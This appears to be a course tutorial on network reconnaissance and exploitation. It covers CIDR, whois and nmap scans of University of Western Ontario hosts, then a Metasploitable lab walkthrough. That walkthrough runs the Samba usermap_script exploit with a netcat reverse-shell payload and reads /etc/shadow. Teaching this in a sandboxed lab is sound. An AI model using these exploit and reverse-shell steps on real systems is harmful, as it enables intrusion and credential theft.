Network Exploitation - nmap and Metasploit
Network Recon
Finding a target device to attack depends on the hacker’s objectives and may be opportunistic or targeted.
Either way, the first step in remote exploitation is to discover the target. After all, one cannot exploit a host that does not exist! The next step consists of gathering public information about the target, including what ports are open and which applications are available over the network.
IP Addresses
Recall an IPv4 address is specified by 4 bytes (32 bits), constituting an integer value between 0 and 2^32-1. Typically an IP address is written as four base-10 octets UUU.VVV.WWW.XXX where UUU, VVV, WWW, and XXX are in the range 0..255.
For example, the IP address of uwo.ca is 129.100.0.79. The University of Western Ontario, however, administers many hosts… an entire network in fact.
We can use CIDR notation to specify a network range. An IP range in this notation has the form UUU.VVV.WWW.XXX/YY where YY is an integer in the range 0..32 specifying that the top YY bits of the IP address are fixed (the remaining 32-YY bits vary).
Here are some examples:
129.100.0.79/8 would specify that the top 8 out of 32 bits of the address are fixed, i.e., it specifies all addresses that vary in the lower (32-8)=24 bits:
    129.  0.  0.  0 = 10000001.00000000.00000000.00000000
    129.255.255.255 = 10000001.11111111.11111111.11111111
129.100.0.79/32 would specify an address range where the top 32 out of 32 bits are fixed. In other words, it specifies the single IP address 129.100.0.79, i.e., just uwo.ca itself:
    129.100.  0. 79 = 10000001.01100100.00000000.01001111
129.100.0.79/29 specifies that the top 29 bits are fixed, i.e., the lower 32-29=3 bits vary. This specifies the 2^3=8 hosts “closest” to uwo.ca (including itself):
    129.100.  0. 72 = 10000001.01100100.00000000.01001000
    129.100.  0. 79 = 10000001.01100100.00000000.01001111
129.100.0.79/0 specifies that 0 out of 32 bits of the address are fixed, meaning this range spans the entire IPv4 space!
      0.  0.  0.  0 = 00000000.00000000.00000000.00000000
    255.255.255.255 = 11111111.11111111.11111111.11111111
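The CIDR arithmetic above, worked through in code. This is an added example, not part of the original notes: the function names are my own, and the block takes any member address of a block (not only its first address), computes the first and last address with plain bit operations, and prints both in the dotted-decimal and dotted-binary layouts used above. The standard-library ipaddress module is used only as a cross-check.

```python
"""Added example (not from the original notes): expand an IPv4 CIDR range.

The top YY bits of UUU.VVV.WWW.XXX/YY are fixed and the lower 32-YY bits
vary, so a block holds 2**(32-YY) addresses. Helper names are my own.
"""
from __future__ import annotations

import ipaddress


def ip_to_int(dotted: str) -> int:
    """Pack four base-10 octets into one 32-bit integer."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {dotted!r}")
    value = 0
    for o in octets:
        value = (value << 8) | o
    return value


def int_to_ip(value: int) -> str:
    """Dotted decimal, e.g. 129.100.0.79."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def int_to_binary(value: int) -> str:
    """Dotted binary, e.g. 10000001.01100100.00000000.01001111."""
    return ".".join(format((value >> shift) & 0xFF, "08b") for shift in (24, 16, 8, 0))


def cidr_range(cidr: str) -> tuple[str, str, int]:
    """Return (first address, last address, number of addresses) of a block.

    The address given may be any member of the block (129.100.0.79/29 is
    the same block as 129.100.0.72/29). A missing /YY means /32.
    """
    addr, _, prefix_s = cidr.partition("/")
    prefix = int(prefix_s) if prefix_s else 32
    if not 0 <= prefix <= 32:
        raise ValueError(f"prefix length out of range: {prefix}")
    host_bits = 32 - prefix
    mask = (0xFFFFFFFF << host_bits) & 0xFFFFFFFF   # top `prefix` bits set
    first = ip_to_int(addr) & mask                  # host bits cleared
    last = first | ((1 << host_bits) - 1)           # host bits set
    return int_to_ip(first), int_to_ip(last), 1 << host_bits


def describe(cidr: str) -> list[str]:
    """Lines in the layout of the examples above: decimal = binary."""
    first, last, count = cidr_range(cidr)
    return [
        f"{cidr}: {count} addresses",
        f"  {first:>15} = {int_to_binary(ip_to_int(first))}",
        f"  {last:>15} = {int_to_binary(ip_to_int(last))}",
    ]


if __name__ == "__main__":
    for block in ("129.100.0.79/8", "129.100.0.79/32", "129.100.0.79/29", "129.100.0.79/0"):
        print("\n".join(describe(block)))
        # Cross-check the hand-rolled arithmetic against the standard library.
        net = ipaddress.ip_network(block, strict=False)
        assert (str(net[0]), str(net[-1])) == cidr_range(block)[:2]
```

Running it reproduces the four ranges listed above; the /29 case is the one worth noticing, since the block starts at .72 even though the scan target was written as .79.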
IPv6
IPv6 uses a 128-bit (16 byte) address usually represented as eight groups of 4 hexadecimal characters, for example:
2001:0db8:0a0b:12f0:0000:0000:0000:0001
which can also be expressed in a compressed form that drops the leading zeros of each group and replaces one run of all-zero groups with "::":
2001:db8:a0b:12f0::1
Whois
Suppose a penetration tester is hired to perform an evaluation of The University of Western Ontario. The permission to conduct this evaluation (if it were for real) would obviously exist between the tester and Western, so the tester would first want to confirm which IP addresses belong to Western.
They can start by gathering basic public information about the domain uwo.ca from ARIN:
$ whois uwo.ca
Domain name: uwo.ca
Domain status: registered
Creation date: 2000/10/13
Expiry date: 2020/01/12
Updated date: 2010/10/15
DNSSEC: Unsigned
Registrar:
Name: Webnames.ca Inc.
Number: 70
Registrant:
Name: The University of Western Ontario
Administrative contact:
Name: Jeff Grieve
Postal address: Support Services Building Rm 4359
London ON N6A3K7 Canada
Phone: +1.5196612151
Fax: +1.5196613486
Email: jeffg@uwo.ca
Technical contact:
Name: Ed Gibson
Postal address: Support Services Building rm 4300
London ON N6A3K7 Canada
Phone: +1.5196612151
Fax: +1.5196613486
Email: noc@uwo.ca
Name servers:
ns1.uwo.ca 129.100.2.12
ns2.uwo.ca 129.100.2.51
ns3.uwo.ca 129.100.74.79
Next the tester should confirm the IP range owned by Western. This is crucial for the tester not only to narrow their search space, but also to ensure they do not try to hack into a host without permission. Even if the company states its IP range in the contract, the tester would want to confirm it.
The tester might first seek to determine the IP address of the company’s main website:
$ nslookup uwo.ca
Server: 209.222.18.222
Address: 209.222.18.222#53
Non-authoritative answer:
Name: uwo.ca
Address: 129.100.0.79
We see uwo.ca has IP address 129.100.0.79. Next we can consult the Whois database to get information about the owner of this address:
$ whois 129.100.0.79
# ARIN WHOIS data and services are subject to the Terms of Use
NetRange: 129.100.0.0 - 129.100.255.255
CIDR: 129.100.0.0/16
NetName: UWO-NET
NetHandle: NET-129-100-0-0-1
Parent: NET129 (NET-129-0-0-0-0)
NetType: Direct Assignment
OriginAS:
Organization: University of Western Ontario (UWO)
RegDate: 1987-10-27
Updated: 2014-02-28
Ref: http://whois.arin.net/rest/net/NET-129-100-0-0-1
OrgName: University of Western Ontario
OrgId: UWO
Address: Information Technology Services
Address: 1393 Western Road
Address: Rm SSB 4352
City: London
StateProv: ON
PostalCode: N6G-1G9
Country: CA
RegDate: 1987-10-27
Updated: 2012-08-31
Ref: http://whois.arin.net/rest/org/UWO
Here we see Western owns a class B network consisting of IPs in the range 129.100.0.0 to 129.100.255.255. We also see that Western registered uwo.ca in 1987, several years before the web was even invented! Of course they were actively using email and FTP and other early internet services.
Ports
A port is a software abstraction. Just as IP addresses are used to identify machines on a network, ports identify specific applications running on a machine. Ports can range in value from 1 to 65535.
Reserved Ports
Ports in the range 1 to 1023 are reserved ports, and Unix systems require applications to have root privileges to bind to these ports. This gives visitors to a site some assurance they are connecting to a valid system service initiated by the system administrator, and not some unprivileged user. For example, the typical port for ssh is 22.
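The reserved-port rule can be observed directly by asking the kernel for a listening socket. The following is an added example, not from the original notes; the helper names are my own. It tries to bind a TCP socket on the loopback address and reports whether the bind succeeded, was refused for lack of privilege (the reserved-port case on a default Unix system), or hit a port that already has a listener.

```python
"""Added example (not from the original notes): probe the reserved-port rule.

bind_result(port) binds 127.0.0.1:port and releases it straight away,
so nothing is left listening. Port 0 asks the kernel for any free
unprivileged port and is the "should always work" baseline.
Helper names are my own.
"""
import errno
import os
import socket

RESERVED_MAX = 1023  # ports 1..1023 are the reserved range described above


def is_reserved(port: int) -> bool:
    """True for ports that need root (or CAP_NET_BIND_SERVICE) on Unix."""
    return 1 <= port <= RESERVED_MAX


def running_as_root() -> bool:
    """Effective UID 0 on Unix; always False where geteuid() is unavailable."""
    return hasattr(os, "geteuid") and os.geteuid() == 0


def bind_result(port: int) -> str:
    """Return "ok", "permission-denied", "in-use", or the errno name.

    "permission-denied" is EACCES: a reserved port requested without the
    privilege to take it. "in-use" is EADDRINUSE: a real service (for
    example sshd on 22) already listens there.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            s.bind(("127.0.0.1", port))
        except PermissionError:          # subclass of OSError, so test it first
            return "permission-denied"
        except OSError as e:
            if e.errno == errno.EADDRINUSE:
                return "in-use"
            return errno.errorcode.get(e.errno, str(e.errno))
    return "ok"


if __name__ == "__main__":
    print(f"running as root: {running_as_root()}")
    for p in (22, 80, 1024, 8080, 0):
        print(f"port {p:>5}  reserved={str(is_reserved(p)):<5}  bind -> {bind_result(p)}")
```

Run as an ordinary user, ports 22 and 80 come back "permission-denied" (or "in-use" where a service already owns them) while 1024, 8080 and 0 come back "ok"; run as root, the low ports bind too. Some Linux hosts and containers lower the boundary with the net.ipv4.ip_unprivileged_port_start sysctl or grant CAP_NET_BIND_SERVICE, so the exact outcome for a low port depends on the machine.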
nmap
nmap is a well-known network scanning tool for discovering hosts and services. It has a wide range of scanning methods and plugins.
Passive Host Discovery
Passive scans are a good place to start gathering basic information about a host. They have the benefit of being stealthy as they do not contact the host.
Using nmap you can use the -sL “list scan” option to do reverse-DNS lookups on neighboring IP addresses. For example:
$ nmap -sL www.uwo.ca/24
will tell you the host names of all the hosts on the class A network shared by uwo.ca. This will potentially allow us to discover interesting host names, such as this one:
Nmap scan report for owl.uwo.ca (129.100.0.33)
Active Host Discovery
Active scans are less stealthy than passive scans since they directly contact the host. This however allows you to gain more information than you could with a passive scan alone, such as whether the host is even currently online.
The -sn option in nmap performs basic host detection (i.e., skips the more detailed port scan):
$ nmap -sn <IP or hostname>/<mask>
The IANA maintains a number of special use domains for the purposes of basic illustrative examples in documents. One such domain is example.com, which you can use to provide another concrete example of nmap’s basic use:
$ nmap -sn example.com
Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.023s latency).
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds
Port Scanning
Port scanning can be used to gain information about what kinds of software and services might be available on a host. Without specifying any options, nmap will do an initial host discovery followed by a basic port scan:
$ nmap example.com
Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.022s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
53/tcp closed domain
80/tcp open http
443/tcp open https
554/tcp closed rtsp
1119/tcp closed bnetgame
1755/tcp closed wms
1935/tcp closed rtmp
Similarly you can use this command to discover hosts and services on your home network, substituting your internal network IP range. First you need to find your own device’s IP address, which you can do in a terminal:
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.3 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 8f80::a28:23af:fe71:b4af prefixlen 64 scopeid 0x20<link>
ether 4b:42:7f:45:ac:ad txqueuelen 1000 (Ethernet)
RX packets 71 bytes 15823 (15.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16 bytes 2304 (2.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Here our IP address is 192.168.1.3, so we can proceed to scan the home network, i.e. 192.168.1.0 to 192.168.1.255, using any number of equivalent commands including:
nmap 192.168.1.0/24
nmap 192.168.1.3/24
nmap 192.168.1.*
The -sV option performs version detection of the services. This doesn’t always work, especially if the sysadmins have taken steps to obfuscate it. In other cases we can learn which server version and OS the target is running. For example, we see eng.uwo.ca is running Windows:
$ nmap -sV eng.uwo.ca
Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:49 EST
Nmap scan report for eng.uwo.ca (129.100.225.244)
Host is up (0.0026s latency).
rDNS record for 129.100.225.244: ebithp8.eng.uwo.ca
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
80/tcp open http Microsoft IIS httpd 7.0
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7937/tcp open rpcbind
7938/tcp open rpcbind
8089/tcp open rpcbind
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows
The -A option prints more detailed information about services, and used with the -sS option it can be reasonably fast. Run against Metasploitable, for example (which is made purposely vulnerable to facilitate pen-testing education), it reveals that the host is running Apache 2.2.8 on Ubuntu:
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
Metasploit and Metasploitable
Metasploit is a customizable exploitation framework for penetration testing. It provides a (somewhat) easy to use interface for managing and deploying exploits. Metasploitable is an intentionally vulnerable version of Linux which allows us to explore exploitation techniques in a sandboxed environment.
Virtual Pen-Testing Lab
We begin by downloading Metasploitable 2 (about 800MB) and the Kali Linux VirtualBox image. Next we configure them to use an internal (virtual) network.
Step 1: Host Discovery
The first step will be for us to discover available hosts:
$ nmap -sn 192.168.1.1/29
Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:32 EST
Nmap scan report for 192.168.1.1
Host is up (0.00026s latency).
MAC Address: 08:00:27:CB:C4:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.2
Host is up (0.00020s latency).
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
Here we see a host available at 192.168.1.2.
Step 2: Port Scanning
Next we can scan 192.168.1.2 to explore its port configuration. In particular we’d like to get a little more detailed information about what application versions are running, so we’ll use the -sV option.
$ nmap -sV 192.168.1.2
Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:33 EST
Nmap scan report for 192.168.1.2
Host is up (0.00015s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
... <additional results> ...
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Metasploitable is configured to have many ports open (to allow many possible avenues for exploitation). In particular we notice port 139 is running Samba 3.X. Interesting. You look up Samba on Wikipedia and read that:
    Some versions of Samba 3.6.3 and lower suffer serious security issues which can allow anonymous users to gain root access to a system from an anonymous connection.
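Two things above are worth automating when a scan produces more than a handful of lines: turning the -sV port table into structured records, and deciding which reported versions need attention. The block below is an added example, not from the original notes or from nmap. It parses the PORT/STATE/SERVICE/VERSION lines (the sample scan text is assembled from the eng.uwo.ca and Metasploitable output shown above), pulls the first dotted version number out of the VERSION column, and compares it against a constructed "affected up to" table that here holds only the Samba "3.6.3 and lower" statement quoted above. The point it demonstrates is the caveat behind "Samba 3.X": nmap could not determine the minor version, so the comparison must report "needs-confirmation" rather than guess either way. Function and table names are my own.

```python
"""Added example (not from the original notes): parse nmap -sV port tables
and triage the reported versions.

SAMPLE_SCAN is assembled from the scan output shown above. AFFECTED_UPTO
is a constructed illustration holding only the "Samba 3.6.3 and lower"
statement quoted above; it is not a vulnerability database.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One row of nmap's port table: "80/tcp open http Microsoft IIS httpd 7.0".
# \s+ copes with both nmap's aligned columns and single-space copies.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# First dotted version number in a VERSION column: "3.X", "7.0", "2.2.8".
VERSION_TOKEN = re.compile(r"\b(\d+(?:\.(?:\d+|[Xx]))+)\b")

SAMPLE_SCAN = """\
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
80/tcp open http Microsoft IIS httpd 7.0
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
49153/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows
"""

# Constructed from the quote above: product -> highest affected version.
AFFECTED_UPTO = {"samba": (3, 6, 3)}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str  # "" when nmap printed no VERSION column for the row


def parse_ports(scan_text: str) -> list[Service]:
    """Return one Service per port-table row; other output lines are skipped."""
    services = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version or ""))
    return services


def version_tuple(version_column: str):
    """(3, 6, 3) for "3.6.3"; None when no version is present;
    "indeterminate" when nmap could only narrow it to something like 3.X."""
    m = VERSION_TOKEN.search(version_column)
    if not m:
        return None
    parts = m.group(1).split(".")
    if any(p in ("X", "x") for p in parts):
        return "indeterminate"
    return tuple(int(p) for p in parts)


def triage(svc: Service) -> str:
    """'affected', 'not-affected', 'needs-confirmation' or 'no-rule'."""
    product = svc.version.split(" ")[0].lower() if svc.version else ""
    ceiling = AFFECTED_UPTO.get(product)
    if ceiling is None:
        return "no-rule"            # nothing in the table for this product
    ver = version_tuple(svc.version)
    if ver is None or ver == "indeterminate":
        return "needs-confirmation"  # e.g. "3.X": do not guess, verify by hand
    return "affected" if ver <= ceiling else "not-affected"


def report(scan_text: str) -> dict[str, str]:
    """Map "port/proto" -> triage result for every open port in the scan."""
    return {f"{s.port}/{s.proto}": triage(s)
            for s in parse_ports(scan_text) if s.state == "open"}


if __name__ == "__main__":
    for key, verdict in report(SAMPLE_SCAN).items():
        print(f"{key:>10}  {verdict}")
```

On the sample scan the Samba row comes out as "needs-confirmation" and the rest as "no-rule", which is the honest summary of what -sV actually established: a product name on port 139 and an unknown minor version, not a confirmed vulnerable build.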
Step 3: Exploit
- Initialize the Metasploit database and start the msfconsole:
$ service postgresql start
$ msfdb init
$ msfconsole
Next check to make sure that the database has connected. Typing:
msf > db_status
Should return:
[*] postgresql connected to msf3
The first time you run Metasploit, you should build the database cache to allow for faster searching:
msf > db_rebuild_cache
This may take 5-10 minutes, so grab a coffee, and restart msfconsole when you come back.
Next we want to search for Samba related exploits:
msf > search samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
...
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
Here we see an Excellent-ranked Samba exploit which we can use. Next we load the exploit:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
We see that this exploit requires us to specify RHOST, i.e., the remote host’s IP address, and RPORT, the target port. We also set LHOST and LPORT, the address and port on our own (Kali) machine that the reverse shell will connect back to:
msf exploit(usermap_script) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(usermap_script) > set LPORT 666
LPORT => 666
msf exploit(usermap_script) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(usermap_script) > set RPORT 139
RPORT => 139
msf exploit(usermap_script) > set TARGET 0
TARGET => 0
Step 4: Payload
Now that the exploit is configured and ready, the final step is to specify the payload, i.e., the malicious code we wish to deliver via the exploit. We need to see which payloads are compatible by typing:
msf > show payloads
to receive a list. We’re going to use a netcat based reverse TCP shell:
msf > set payload cmd/unix/reverse_netcat
Now we’re ready to go:
msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.3:666
msf exploit(usermap_script) > [*] Command shell session 1 opened (192.168.1.3:666 -> 192.168.1.2:38741) at 2016-02-22 12:08:50 -0500
Now if we type sessions we get:
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 192.168.1.3:666 -> 192.168.1.2:38741 (192.168.1.2)
So now we want to bind to the active session:
msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...
After a few moments you will be able to type commands!
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
Additional Resources
- NixCraft Top 30 Nmap Command Examples For Sys/Network Admins
- Metasploit tutorial for beginners
- Metasploit Unleashed, a free online course on penetration testing using Metasploit.